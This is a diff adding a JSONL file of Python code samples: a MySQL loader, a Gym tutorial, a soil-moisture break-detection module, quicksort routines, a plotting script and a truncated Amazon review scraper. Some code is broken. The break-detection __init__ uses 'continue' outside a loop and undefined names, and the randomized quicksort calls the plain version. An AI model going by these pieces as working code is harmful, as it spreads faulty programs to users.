diff --git "a/4160.jsonl" "b/4160.jsonl" new file mode 100644--- /dev/null +++ "b/4160.jsonl" @@ -0,0 +1,701 @@ +{"seq_id":"167380444","text":"import json\nimport os\nimport MySQLdb\n\ndef main():\n config = CONFIG\n load_data(config)\n\ndef get_config():\n config_file = None\n path = os.path.dirname(os.path.realpath(__file__))\n try:\n config_file = open(file=\"{}/parameters/config.json\".format(path), mode=\"r\")\n config_str = config_file.read()\n config_json = json.loads(config_str)\n return config_json\n finally:\n if (config_file!=None):\n config_file.close()\n\ndef execute_query(config, table):\n connection = MySQLdb.connect(host=config[\"host\"], user=config[\"user\"], passwd='')\n path = os.path.dirname(os.path.realpath(__file__))\n cursor = connection.cursor()\n query = \"LOAD DATA LOCAL INFILE \" \\\n \"'{}/landing/{}.tbl' \" \\\n \"INTO TABLE {}.{} FIELDS TERMINATED BY '|'\".format(path, table, config['database'], table)\n try:\n try:\n cursor.execute(query)\n connection.commit()\n except (MySQLdb.Error, MySQLdb.Warning) as e:\n print(e)\n return None\n finally:\n connection.close()\n\ndef load_data(config):\n for table in config['tables']:\n print(\"loading \" + table + \" table \")\n execute_query(config, table)\n\nCONFIG = get_config()\n\nif __name__ == \"__main__\":\n main()","sub_path":"dinesh_solution/initial_load.py","file_name":"initial_load.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"100480446","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Sep 28 18:25:59 2018\r\n\r\n@author: Junaid.raza\r\n\"\"\"\r\n\r\n\"\"\"\r\nRinforcment Learnign is about a men, machine or a neural net to learning to navigate an\r\nuncertain environment with the goal of maximizing numerical reward.\r\nSports is the best examples. Where your action changes the status of your game.\r\nEach action is completed for a reward (0,1) \r\nHave to follow the policy or rule to maximze the score.\r\n\r\nThere is an Agent.\r\nAgent have an Environmnent.\r\nAgent knows the State (S) of Environment.\r\nAgent takes any Action (A).\r\nEnvironment updates with new State (S) and some Reward (R) in form of Binary (0,1).\r\n\r\nAgent doesnt know about Environment. He is just experiencing the environment by actions , state and reward.\r\n\r\nGym is a toolkit for developing and comparing reinforcement learning algorithms.\r\n\"\"\"\r\nimport gym\r\n\r\n\"\"\"\r\nHere’s a bare minimum example of getting something running. This will run an \r\ninstance of the CartPole-v0 environment for 1000 timesteps, rendering the environment \r\nat each step. 
You should see a window pop up rendering the classic cart-pole problem:\r\n\r\n\"\"\"\r\n#This code is to test first form of our algorithm\r\n#UnComment these four lines to see first shape and comment the below code\r\n#env = gym.make('CartPole-v0')\r\n#env.reset()\r\n#for _ in range(1000):\r\n# env.render()\r\n# env.step(env.action_space.sample()) # take a random action\r\n \r\n \r\nenv = gym.make('CartPole-v0')\r\nfor i_episode in range(20):\r\n observation = env.reset()\r\n for t in range(100):\r\n env.render()\r\n print(observation)\r\n action = env.action_space.sample()\r\n observation, reward, done, info = env.step(action)\r\n if done:\r\n print(\"Episode finished after {} timesteps\".format(t+1))\r\n break\r\n\r\n\"\"\"\r\ntry replacing CartPole-v0 above with something like MountainCar-v0, \r\nMsPacman-v0 (requires the Atari dependency), or Hopper-v1 (requires the MuJoCo dependencies). \r\n\"\"\"\r\n\r\n\"\"\"\r\nIf we ever want to do better than take random actions at each step, \r\nit’d probably be good to actually know what our actions are doing to the environment.\r\n\r\nThe environment’s step function returns exactly what we need. In fact, step returns \r\nfour values. These are:\r\n \r\n observation (object): \r\n an environment-specific object representing your observation of the environment. \r\n For example, pixel data from a camera, joint angles and joint velocities of a robot, \r\n or the board state in a board game.\r\n reward (float): \r\n amount of reward achieved by the previous action. The scale varies between \r\n environments, but the goal is always to increase your total reward\r\n done (boolean): \r\n whether it’s time to reset the environment again. Most (but not all) \r\n tasks are divided up into well-defined episodes, and done being True indicates the \r\n episode has terminated. (For example, perhaps the pole tipped too far, or you lost \r\n your last life.)\r\n info (dict): \r\n diagnostic information useful for debugging. It can sometimes be useful for \r\n learning (for example, it might contain the raw probabilities behind the \r\n environment’s last state change). However, official evaluations of your agent \r\n are not allowed to use this for learning.\r\n \r\n \r\nSpaces\r\nIn the examples above, we’ve been sampling random actions from the environment’s \r\naction space. But what actually are those actions? Every environment comes with an \r\naction_space and an observation_space. These attributes are of type Space, and they \r\ndescribe the format of valid actions and observations:\r\n \r\n import gym\r\n env = gym.make('CartPole-v0')\r\n print(env.action_space)\r\n #> Discrete(2)\r\n print(env.observation_space)\r\n #> Box(4,)\r\n \r\nThe Discrete space allows a fixed range of non-negative numbers, so in this case \r\nvalid actions are either 0 or 1. The Box space represents an n-dimensional box, so \r\nvalid observations will be an array of 4 numbers. We can also check the Box’s bounds:\r\n \r\n print(env.observation_space.high)\r\n #> array([ 2.4 , inf, 0.20943951, inf])\r\n print(env.observation_space.low)\r\n #> array([-2.4 , -inf, -0.20943951, -inf])\r\n \r\nThis introspection can be helpful to write generic code that works for many different \r\nenvironments. Box and Discrete are the most common Spaces. 
You can sample from a Space \r\nor check that something belongs to it:\r\n \r\n from gym import spaces\r\n space = spaces.Discrete(8) # Set with 8 elements {0, 1, 2, ..., 7}\r\n x = space.sample()\r\n assert space.contains(x)\r\n assert space.n == 8\r\n\"\"\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Reinforcement Learning/Reinforcement_Learning.py","file_name":"Reinforcement_Learning.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"413427033","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 07 13:46:17 2016\n\n@author: wpreimes\n\"\"\"\nimport warnings\nimport numpy as np\nimport pandas as pd\nimport scipy.stats as stats\nfrom typing import Union\nfrom pytesmo.time_series.anomaly import calc_anomaly\nfrom collections import Counter\nfrom datetime import datetime\n\nfrom scipy.stats import fligner, levene\nfrom ccibreakadjustment.cci_timeframes import CCITimes\nfrom ccibreakadjustment.otherfunctions import regress, datetime2matlabdn\nfrom ccibreakadjustment.import_satellite_data import QDEGdata_D\nfrom ccibreakadjustment.import_ismn_data import ISMNdata\n\nwarnings.simplefilter(action=\"ignore\", category=RuntimeWarning)\n\n\nclass BreakTestData(object):\n '''\n Class containing properties of data used for break detection\n '''\n def __init__(self, test_prod, ref_prod, anomaly):\n # type: (str,str,Union(bool,str)) -> None\n '''\n :param test_prod: str\n Name of the product as in QDEGdata to test for breaks against the reference\n e.g for CCI: CCI_*version*_*PRODUCT*\n :param ref_prod: str\n Name of the reference product as in QDEGdata\n e.g merra2\n :param anomaly: bool\n Set True to use anomaly data for testing\n '''\n self.ref_prod = ref_prod\n self.test_prod = test_prod\n self.range = CCITimes(self.test_prod, ignore_position=True).get_times(None, as_datetime=False)['ranges']\n self.anomaly = anomaly\n if self.ref_prod == 'ISMN-Merge':\n self.ismndata = ISMNdata(None, max_depth=0.1)\n self.data = QDEGdata_D(products=[self.test_prod])\n else:\n self.data = QDEGdata_D(products=[self.ref_prod, self.test_prod])\n\n\n def read_gpi(self, gpi, start=None, end=None):\n '''\n Read time series for the class products from start date to end date\n\n :param gpi: int\n index of ground point for which data is read\n :param start: string (%Y-%m-%d)\n Start date of the time series to read\n :param end: string (%Y-%m-%d)\n End date of the time series to read\n :return: pd.DataFrame\n DataFrame of SM values of the test product and ref product\n '''\n\n # Import the test data and reference datasets for the active ground point\n if not start:\n start = self.range[0]\n if not end:\n end = self.range[1]\n\n if self.anomaly == 'ccirange':\n # Calculate the anomaly over the whole CCI version time frame (1978-present)\n range = [time.strftime('%Y-%m-%d') for time in self.range]\n try:\n df_time = (self.data).read_gpi(gpi, range[0], range[1])\n df_time = df_time / 100 # type: pd.DataFrame\n\n df_time[self.ref_prod] = calc_anomaly(df_time[self.ref_prod])\n df_time[self.test_prod] = calc_anomaly(df_time[self.test_prod])\n except:\n raise Exception('9: Could not import data for gpi %i' % gpi)\n\n if self.ref_prod == 'ISMN-Merge':\n print('CCI range anomaly wont work with ISMN data')\n\n else:\n try:\n if self.ref_prod == 'ISMN-Merge':\n df_time = self.data.read_gpi(gpi, start, end)\n df_time['ISMN-Merge'] = self.ismndata.read_gpi(gpi, start, end)\n df_time = df_time / 100 
# type: pd.DataFrame\n else:\n df_time = self.data.read_gpi(gpi, start, end)\n df_time = df_time / 100\n\n if self.anomaly == 'timeframe':\n df_time[self.ref_prod] = calc_anomaly(df_time[self.ref_prod])\n df_time[self.test_prod] = calc_anomaly(df_time[self.test_prod])\n except:\n raise Exception('9: Could not import data for gpi %i' % gpi)\n\n df_time = df_time.rename(columns={self.ref_prod: 'refdata_original',\n self.test_prod: 'testdata_original'})\n\n # Drop days where either dataset is missing\n return df_time\n\n def group_by_breaktime(self, df_time_in, breaktime, min_data_size, ignore_exception=False):\n '''\n Divide Time Series into 2 subgroups according to breaktime (before/after)\n\n :param df_time: pd.DataFrame\n :param breaktime: datetime\n :return: pd.DataFrame\n '''\n df_time = df_time_in.copy()\n df_time['group'] = np.nan\n\n i1 = df_time.loc[:breaktime]\n i2 = df_time.loc[breaktime + pd.DateOffset(1):]\n\n df_time.loc[i1.index, 'group'] = 0\n df_time.loc[i2.index, 'group'] = 1\n ni1 = len(i1.index)\n ni2 = len(i2.index)\n\n # Check if group data sizes are above selected minimum size\n if not ignore_exception:\n if ni1 < min_data_size or ni2 < min_data_size:\n raise Exception('4: Minimum Dataseries Length not reached. Size is %i and/or %i !> %i'\n % (ni1, ni2, min_data_size))\n\n return df_time, ni1, ni2\n\n @staticmethod\n def temp_resample(df_in, how='M', threshold=None):\n '''\n Resample a dataframe to monthly values, if the number of valid values (not nans) in a month\n is smaller than the defined threshold, the monthly resample will be NaN\n\n :param how: str\n Time frame for temporal resampling, M = monthly, 10D = 10daily,...\n :param threshold: float\n % of valid days (not nan) in timeframe defined in 'how'\n :return: pd.DataFrame\n The monthly resampled Data\n '''\n df = df_in.copy()\n\n if 'refdata' in df.columns:\n #TODO: Move this outside the function\n # Check if any data is left for testdata and reference data\n if df.isnull().all().refdata or df.isnull().all().testdata:\n raise Exception('2: No data for the selected timeframe')\n if not threshold:\n return df.resample(how).mean()\n else:\n if how != 'M':\n raise NotImplementedError\n\n years, months = df.index.year, df.index.month\n\n if len(years)==0 or len(months)==0:\n return None\n\n startday = datetime(years[0], months[0], 1)\n last_year, last_month = years[-1], months[-1]\n\n if last_month == 12:\n next_month, next_year = 1 , last_year + 1\n else:\n next_month, next_year = last_month + 1, last_year\n\n days_last_month = (datetime(next_year, next_month, 1) - datetime(last_year, last_month, 1)).days\n endday = datetime(last_year, last_month, days_last_month)\n\n index_full = pd.DatetimeIndex(start=startday, end = endday, freq = 'D')\n df_alldays = pd.DataFrame(index=index_full,\n data = {'count_should' : 1}).resample(how).sum()\n\n df_mean = df.resample(how).mean()\n df['count'] = 1\n df_mean['count_is'] = df[['count']].resample(how).sum()\n df_mean['count_should'] = df_alldays['count_should'] * threshold\n\n df_filtered = df_mean.loc[df_mean['count_is'] >= df_mean['count_should']]\n\n return df_filtered.drop(['count_should', 'count_is'], axis=1), df_filtered[['count_should', 'count_is']]\n\n\n def ref_data_correction(self, df_time, refdata_col_name, ignore_exceptions=False):\n '''\n Scale the column \"refdata\" in the given dataframe to values of \"testdata\" in the dataframe\n\n :param df_time: pd.DataFrame\n SM values, columns must be named 'refdata' and 'testdata'\n :return: pd.DataFrame\n DataFrame with 
bias corrected reference data\n '''\n data = df_time.copy()\n adjusted_data, rxy, pval, ress = regress(data, refdata_col_name)\n\n data['bias_corr_refdata'] = adjusted_data\n\n if not ignore_exceptions and any(np.isnan(ress)):\n raise Exception('5: Negative or NaN correlation after refdata correction')\n\n return data['bias_corr_refdata']\n\n\nclass BreakTestBase(BreakTestData):\n '''\n Class containing functions and properties for relative homogeneity testing\n '''\n def __init__(self, gpi, test_prod, ref_prod, tests, alpha, anomaly,\n refdata_correction_for = 'timeframe'):\n # type: (int,str,str,dict,float,Union(bool,str)) -> None\n '''\n :param test_prod: str\n as in BreakTestData\n :param ref_prod: str\n as in BreakTestData\n :param tests: dict\n dictionary of test types and test names as implemented in self.run_tests()\n eg. {'mean':wilkoxon, 'var':'scipy_fligner_killeen'}\n :param alpha: float\n significance level for all tests\n :param anomaly: str\n as in BreakTestData\n '''\n\n BreakTestData.__init__(self, test_prod, ref_prod, anomaly)\n self.tests = tests\n self.fligner_approx = 'chi' #TODO: defined by user, implement fisher\n self.alpha = alpha\n self.ref_data_correction_for = refdata_correction_for\n self.temp_resample_to = 'M'\n self.threshold_for_temp_resample =0.3\n self.tf_min_corr_pval = (0, 0.05)\n self.min_data_size = 5\n\n\n try: # load testdata and reference data\n self.df_time = self.read_gpi(gpi, self.range[0], self.range[1])\n self.df_time['testdata'] = self.df_time['testdata_original'].copy(deep=True)\n self.df_time['testdata_RAW'] = self.df_time['testdata_original'].copy(deep=True)\n except:\n if process_logs: process_log.add_line('ERROR: loading data failed', 1)\n continue\n\n self.df_tf = None\n\n if process_logs: process_log.add_line('reference data bias correction', 1)\n corrected_refdata = test_obj.ref_data_correction(df_time.loc[:, ['testdata', 'refdata_original']],\n 'refdata_original',\n ignore_exceptions=True)\n df_time.loc[:, 'refdata_original'] = corrected_refdata\n\n times = times_obj.get_times(gpi, as_datetime=True)\n timeframes, breaktimes = times['timeframes'], times['breaktimes']\n\n\n def difference_ts(self):\n return self.df_tf['testdata'] - self.df_tf['refdata']\n\n\n def select_timeframe(self, timeframe, breaktime):\n # Select subset\n # Perform biascorrection\n # Goup\n self.df_tf = self.data[timeframe[0]:timeframe[1]].copy()\n if self.ref_data_correction_for == 'timeframe':\n self.df_tf = self.ref_data_correction(self.df_tf, 'refdata')\n self.df_tf = self.temp_resample(self.df_tf, self.temp_resample_to, self.threshold_for_temp_resample)\n corr, pval = self.check_corr(self.df_tf, self.tf_min_corr_pval[0], self.tf_min_corr_pval[1])\n self.df_tf['Q'] = self.difference_ts()\n self.df_tf = self.group_by_breaktime(self.df_tf,\n breaktime,\n self.min_data_size)\n\n\n def get_testresults(self):\n return self.testresults\n\n def check_testresult(self, testresult):\n '''\n Checks if all tests are negative (no break)\n\n :param testresult: dict\n test results as returned by run_tests\n :return: bool\n '''\n test_h = {test: testresult['h_%s' % test] for test in self.tests.values()}\n if all([h == 0 for h in test_h.values()]):\n return None, None, False\n else:\n break_found_by = []\n failed_tests = []\n for test in self.tests.values():\n if test_h[test] == 1:\n break_found_by.append(test)\n elif test_h[test] == 99:\n failed_tests.append(test)\n\n has_break = True if break_found_by else False\n\n return failed_tests if failed_tests else None, \\\n 
break_found_by if break_found_by else None, \\\n has_break\n\n def compare_testresults(self, reference_result, last_result, priority='mean'):\n ref_tests_failed, ref_found_by, ref_has_break = self.check_testresult(reference_result)\n last_tests_failed, last_found_by, last_has_break = self.check_testresult(last_result)\n\n if ref_has_break and not last_has_break:\n # Break was removed --> better\n return True\n elif ref_has_break and last_has_break:\n # Both found break, use priority to decide\n # compare tests\n if Counter(ref_found_by) == Counter(last_found_by): # Same tests found break\n return False # nothing improved --> worse\n elif priority:\n for p in priority:\n if (self.tests[p] in ref_found_by) and (self.tests[p] not in last_found_by):\n return True # --> Priority was removed, other might have been added\n else:\n continue # Move to next Priority\n return False # --> Priority was not removed\n else:\n return False # --> no priority defined\n\n\n @staticmethod\n def wk_test(dataframe, alternative='two-sided', alpha=0.01):\n # type: (pd.DataFrame, str) -> (float,dict)\n\n U_wk, p_wk = stats.mannwhitneyu(dataframe['Q'].loc[dataframe['group'] == 0],\n dataframe['Q'].loc[dataframe['group'] == 1],\n alternative=alternative)\n stats_wk = stats.ranksums(dataframe['Q'].loc[dataframe['group'] == 0],\n dataframe['Q'].loc[dataframe['group'] == 1])[0] # type: dict\n\n\n\n if p_wk < alpha:\n h = 1\n else:\n h = 0\n\n return h, {'zval': stats_wk, 'pval': p_wk}\n\n @staticmethod\n def fk_test(dataframe_in, mode='median', alpha=0.01):\n # type: (pd.DataFrame, str, float) -> (int,dict)\n '''\n FKTEST Fligner-Killeen test for homogeneity of variances.\n\n Trujillo-Ortiz, A., R. Hernandez-Walls and N. Castro-Castro. (2009).FKtest:\n Fligner-Killeen test for homogeneity of variances. A MATLAB file. [WWW document].\n URL http://www.mathworks.com/matlabcentral/fileexchange/25040\n\n Input data format:\n Dataframe: 2 columns\n column1 (data): difference data Q column2 (group): group number (1 or 2 für reference data or testdata)\n '''\n\n # number of measurements and datagroups\n dataframe = dataframe_in.copy()\n df = dataframe.rename(columns={'Q': 'data'})\n df = df.dropna()\n N = df.index.size\n K = df['group'].nunique()\n\n df['A'] = np.nan\n\n if mode == 'median':\n for i in range(K):\n subset = df.ix[df['group'] == i]\n groupmed = subset.data.median()\n df.ix[df['group'] == i, 'groupmed'] = groupmed # group medians\n df.ix[df['group'] == i, 'groupme_diff'] = np.abs(\n subset['data'] - groupmed) # difference data-groupmedians\n\n if mode == 'mean':\n for i in range(K):\n subset = df.ix[df['group'] == i]\n groupmean = subset.data.mean()\n df.ix[df['group'] == i, 'groupmean'] = groupmean # groupmeans\n df.ix[df['group'] == i, 'groupme_diff'] = np.abs(\n subset['data'] - groupmean) # difference data-groupmeans\n\n Z = stats.rankdata(df['groupme_diff']) # score ranking ALL\n sta_norm_dist = stats.norm.ppf(0.5 + (Z / (2. 
* (N + 1.)))) # score standard normal distribution ALL\n df['A'] = sta_norm_dist\n M = df['A'].mean() # overall mean\n\n nn = []\n mm = []\n bb = []\n for i in range(K):\n subset = df.ix[df['group'] == i]\n\n nn.append(subset.index.size)\n mm.append(np.mean(subset['A']))\n df.ix[df['group'] == i, 'groupAmean'] = mm[i]\n bb.append((nn[i] * (mm[i] - M) ** 2))\n df.ix[df['group'] == i, 'groupB'] = bb[i]\n\n B = np.array(df['groupB'].unique())\n V = df['A'].var() # Overall Variance Score\n X2 = np.sum(B) / V # Fligner-Killeen statistic by the Chi-squared approximation\n v = K - 1 # statistic degree of freedom\n F = (X2 / v) / ((N - 1. - X2) / (N - K)) # Fligner-Killeen statistic by the Fisher approximation\n\n P1 = 1 - stats.chi2.cdf(X2, v)\n P2 = 1 - stats.f.cdf(F, v, N - K)\n\n # TODO: Laut Chun-Hsu statt F X2??\n stats_fk = {'chi': {'z': X2, 'df': v, 'pval': P1}, 'f': {'z': F, 'df': [v, N - K], 'pval': P2}}\n\n if stats_fk['chi']['pval'] < alpha:\n h = 1\n else:\n h = 0\n\n return h, stats_fk\n\n @staticmethod\n def scipy_fk_test(dataframe, mode='median', alpha=0.1):\n df = dataframe.rename(columns={'Q': 'data'})\n df = df.dropna()\n sample1 = df[df['group'] == 0.]['data'].values\n sample2 = df[df['group'] == 1.]['data'].values\n\n stats, pval = fligner(sample1, sample2, center=mode)\n\n stats_fk = {'chi': {'z': stats, 'pval': pval}}\n\n if stats_fk['chi']['pval'] < alpha:\n h = 1\n else:\n h = 0\n return h, stats_fk\n\n @staticmethod\n def lv_test(dataframe, mode='median', alpha=0.1):\n #TODO: Not tested\n df = dataframe.rename(columns={'Q': 'data'})\n df = df.dropna()\n sample1 = df[df['group' == 0.].index]['Q'].values\n sample2 = df[df['group' == 1.].index]['Q'].values\n\n stats, pval = levene(sample1, sample2, center=mode)\n\n stats_lv = {'chi': {'z': stats, 'pval': pval}}\n\n if stats_lv['chi']['pval'] < alpha:\n h = 1\n else:\n h = 0\n return h, stats_lv\n\n def check_corr(self, df_time, min_corr=0, min_p = 0.05):\n # Calculation of Spearman-Correlation coefficient\n corr, pval = stats.spearmanr(df_time['testdata'], df_time['refdata'], nan_policy='omit')\n\n # Check the rank correlation so that correlation is positive and significant\n if not (corr > min_corr and pval < min_p): # TODO: stricter thresholds?\n raise Exception('3: Spearman correlation failed with correlation %f ' \n '(must be >0) and pval %f (must be <0.05)' % (corr, pval))\n\n return corr, pval\n\n def restructure_test_results(self, test_results):\n # type: (dict) -> dict\n\n restructured_results = {}\n\n for test in self.tests.values():\n restructured_results['h_%s' % test] = test_results[test]['h']\n if np.isnan(restructured_results['h_%s' % test]): continue\n if self.fligner_approx in test_results[test]['stats'].keys():\n stats = test_results[test]['stats'][self.fligner_approx]\n restructured_results['z_%s' % test] = stats['z']\n else:\n stats = test_results[test]['stats']\n restructured_results['p_%s' % test] = stats['pval']\n\n test_status = 1 # '1: Testing successful'\n\n if 'mean' in self.tests.keys():\n mean_test_result = restructured_results['h_%s' % self.tests['mean']]\n if np.isnan(mean_test_result):\n test_status = 6 # '6: WK was selected but failed.'\n restructured_results['h_%s' % self.tests['mean']] = np.nan\n else:\n mean_test_result = np.nan\n if 'var' in self.tests.keys():\n var_test_result = restructured_results['h_%s' % self.tests['var']]\n if np.isnan(var_test_result):\n test_status = 7 # '7: FK was selected but failed.'\n restructured_results['h_%s' % self.tests['var']] = np.nan\n else:\n 
var_test_result = np.nan\n\n # Combine results to single value\n #TODO: Do this when plotting data\n if mean_test_result == 1:\n if var_test_result == 1:\n all = 3.0\n else:\n all = 1.0\n elif var_test_result == 1:\n all = 2.0\n else:\n all = 4.0\n\n restructured_results.update({'test_results': all, 'test_status': test_status})\n\n return restructured_results\n\n def run_tests(self, data):\n # type: (pd.DataFrame, list) -> (pd.DataFrame, dict)\n '''\n Prepares Data for Testing. Bias Correction of Reference Data. Analyzes data sufficiency.\n :param data:\n :param breaktime:\n :param min_data_size:\n :return:\n '''\n tests = self.tests.values()\n testresults = {}\n\n # Wilcoxon rank sum test\n if 'wilkoxon' in tests:\n try:\n h_wk, stats_wk = self.wk_test(data, 'two-sided')\n wilkoxon = {'h': h_wk, 'stats': stats_wk}\n except:\n wilkoxon = {'h': np.nan, 'stats': np.nan}\n pass\n testresults['wilkoxon'] = wilkoxon\n if 'fligner_killeen' in tests:\n try:\n h_fk, stats_fk = self.fk_test(data[['Q', 'group']], mode='median', alpha=self.alpha)\n fligner_killeen = {'h': h_fk, 'stats': stats_fk}\n except:\n fligner_killeen = {'h': np.nan, 'stats': np.nan}\n pass\n testresults['fligner_killeen'] = fligner_killeen\n if 'scipy_fligner_killeen' in tests:\n try:\n h_fk, stats_fk = self.scipy_fk_test(data[['Q', 'group']], mode='median', alpha=self.alpha)\n fligner_killeen = {'h': h_fk, 'stats': stats_fk}\n except:\n fligner_killeen = {'h': np.nan, 'stats': np.nan}\n pass\n testresults['scipy_fligner_killeen'] = fligner_killeen\n\n self.testresults = self.restructure_test_results(testresults)\n\n return self.testresults\n\n\ndef get_test_meta():\n results_meta = {'1' : 'WK only',\n '2' : 'FK only',\n '3' : 'WK and FK',\n '4' : 'None'}\n status_meta = {'0' : 'Not tested (initial)',\n '1' : 'Testing successful',\n '2' : 'No data for the selected timeframe',\n '3' : 'Spearman correlation too low',\n '4' : 'Min. Dataseries len. not reached',\n '5' : 'neg/nan correl. aft. bias corr.',\n '6' : 'WK was selected but failed',\n '7' : 'FK was selected but failed',\n '8' : 'WK test and FK test failed',\n '9' : 'Could not import data for gpi'}\n\n return results_meta, status_meta\n\n","sub_path":"ccibreakadjustment/trash/old_break_detection_interface.py","file_name":"old_break_detection_interface.py","file_ext":"py","file_size_in_byte":22848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"539543695","text":"# -*- coding: utf-8 -*-\n#Divide and conquer\n#1. Divide: Partition array into 2 subarrays around pivot x,\n#such that elements in lower subarray <= x <= elements in upper subarray\n#2. Conquer: Recursively sort 2 subarrays\n#3. 
Combine: Trivial\n\nimport random\n\ndef partition(array, start, end):\n\n pivot = array[start]\n l = start\n for i in range(start+1, end+1):\n if array[i] <= pivot:\n l = l + 1\n array[i], array[l] = array[l], array[i]\n array[start], array[l] = array[l], array[start]\n\n return l\n\ndef quicksort(array, start, end):\n\n if end > start:\n mid = partition(array, start, end)\n quicksort(array, start, mid-1)\n quicksort(array, mid+1, end)\n\ndef quicksortRandimize(array, start, end):\n #Running time is independent of input ordering\n #No assumption about input distribution\n #No specific input elicit worst behavior\n #Worst case determined only by random number generator\n if end > start:\n mid = partitionRandimize(array, start, end)\n quicksort(array, start, mid-1)\n quicksort(array, mid+1, end)\n\ndef partitionRandimize(array, start, end):\n r = random.randint(start, end)\n array[r], array[start] = array[start], array[r]\n pivot = array[start]\n l = start\n for i in range(start+1, end+1):\n if array[i] <= pivot:\n l = l + 1\n array[i], array[l] = array[l], array[i]\n array[start], array[l] = array[l], array[start]\n\n return l\n\nalist = random.sample(range(1,10000),100)\nquicksort(alist, 0, len(alist)-1)\nprint(alist)\n\nalistr = random.sample(range(1,10000),100)\nquicksortRandimize(alistr, 0, len(alistr)-1)\nprint(alistr)","sub_path":"quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"87244127","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Feb 8 19:57:02 2020\r\n\r\n@author: Ching Hoe Lee\r\n\"\"\"\r\n\r\nimport scipy as sp\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\ndata=np.loadtxt('taskiie.csv',delimiter=',')\r\nunique_h_list=[]\r\ncounts_h_list=[]\r\nL=np.array([4,8,16,32,64,128,256])\r\nstd_height=np.std(data,axis=1)\r\nfor i in data:\r\n unique_h,counts_h=np.unique(i,return_counts=True)\r\n unique_h_list.append(unique_h)\r\n counts_h_list.append(counts_h)\r\nscale_y_list=[]\r\nj=0\r\nwhile j <=6:\r\n x=unique_h_list[j]\r\n y=counts_h_list[j]/100000\r\n scale_y=np.std(unique_h_list[j])*counts_h_list[j]/100000\r\n scale_y_list.append(scale_y)\r\n plt.plot(x, y, label=f'L={L[j]}')\r\n j+=1\r\nplt.legend()\r\nplt.ylabel('probability')\r\nplt.xlabel('height')\r\nplt.savefig('probability.png')\r\nplt.figure()\r\n\r\nk=0\r\nwhile k<=6:\r\n new_y=scale_y_list[k]\r\n quan=unique_h_list[k]-np.mean(unique_h_list[k])\r\n new_x=quan*(np.std(unique_h_list[k]))**(-1)\r\n plt.plot(new_x,new_y,label=f'L={L[k]}')\r\n plt.legend()\r\n plt.savefig('datacollapse.png')\r\n k+=1\r\n\r\nplt.legend()\r\nplt.show()","sub_path":"pretask2g.py","file_name":"pretask2g.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"33785909","text":"\"\"\"Scraper extracts data from raw HTML and creates corresponding objects.\"\"\"\nimport models\nimport bs4\nimport datetime\nimport re\n\nnum_format = '(\\d+(?:\\,\\d{3})*)'\n\n\ndef _get_date(date_str):\n \"\"\"\n Attempts to parse a valid time using Amazon's format\n :param time_str: a string to parse\n :return: A valid datetime, or None if the conversion was invalid\n \"\"\"\n re.sub(' (\\d) ', ' 0{} ', date_str)\n try:\n return datetime.datetime.strptime(date_str, '%B %d, %Y')\n except ValueError:\n return None\n\n\ndef _select(element, query, important=True):\n result = element.select_one(query)\n if result is 
None and important:\n raise Exception('Element not found: {}'.format(query))\n return result\n\n\ndef _select_all(element, query, important=True):\n results = element.select(query)\n if results is [] and important:\n raise Exception('Element not found: {}'.format(query))\n return results\n\n\ndef _find(element, important=True, **kwargs):\n result = element.find(**kwargs)\n if result is None and important:\n raise Exception('Element not found: {}'.format(kwargs))\n return result\n\n\ndef _find_all(element, important=True, **kwargs):\n results = element.find_all(**kwargs)\n if results is [] and important:\n raise Exception('Element not found: {}'.format(kwargs))\n return results\n\n\ndef get_reviews_url(html):\n \"\"\"\n Gets the URL of a product's reviews\n :param html: The HTML of the product's review iFrame\n :return: The URL of the product's reviews\n \"\"\"\n dom = bs4.BeautifulSoup(html, 'html.parser')\n return _select(dom, '.crIframeReviewList span.small > b > a')['href']\n\n\ndef get_amazon_rating(html):\n \"\"\"\n Gets the amazon rating of a product\n :param html: A string containing the html of a product ratings page\n :return: The amazon rating of a product as a double\n \"\"\"\n dom = bs4.BeautifulSoup(html, 'html.parser')\n return float(_select(dom, '.arp-rating-out-of-text').text[:3])\n\n\ndef get_page_count(html):\n \"\"\"\n Gets the number of review pages belonging to a product\n :param html: A string containing the html of a product ratings page\n :return: Number of pages as an int\n \"\"\"\n dom = bs4.BeautifulSoup(html, 'html.parser')\n page_buttons = _select_all(dom, '.page-button', important=False)\n if page_buttons:\n return int(page_buttons.pop().text)\n else:\n return 1\n\n\ndef get_review_url_list(html):\n \"\"\"\n Returns a list of URLs that link to amazon reviews\n :param html: A string containing the html of a product ratings page\n :return: A list of URL strings\n \"\"\"\n dom = bs4.BeautifulSoup(html, 'html.parser')\n titles = _select_all(dom, 'a.review-title')\n return ['http://www.amazon.com{}'.format(title['href']) for title in titles]\n\n\ndef get_review(html):\n \"\"\"\n Parses a review object based on an html string\n :param html: A string containing the html of a reviewer page\n :return: A parsed reviewer object\n \"\"\"\n review = models.Review()\n dom = bs4.BeautifulSoup(html, 'html.parser')\n # parse the 'hReview' element that contains several needed pieces of data\n review.text = _select(dom, '.reviewText').text\n review.verified = _select(dom, '.verifyWhatsThis', important=False) is not None\n dates = [_get_date(tag.text) for tag in _select_all(dom, 'nobr')]\n review.timestamp = filter(None, dates)[0]\n\n reviewer_element = _select(dom, '.hReview .reviewer .url')\n review.reviewer_url = 'http://www.amazon.com{}'.format(reviewer_element['href'])\n vote_text = _select(dom, '.reviewText').parent.find('div', text=re.compile('^\\s+{0} of {0} .+'.format(num_format)))\n\n if vote_text:\n up, total = re.findall(re.compile(num_format), vote_text.text)\n review.upvote_count = int(up)\n review.downvote_count = int(total) - int(up)\n else:\n review.upvote_count = review.downvote_count = 0\n\n rating_text = _find(dom, 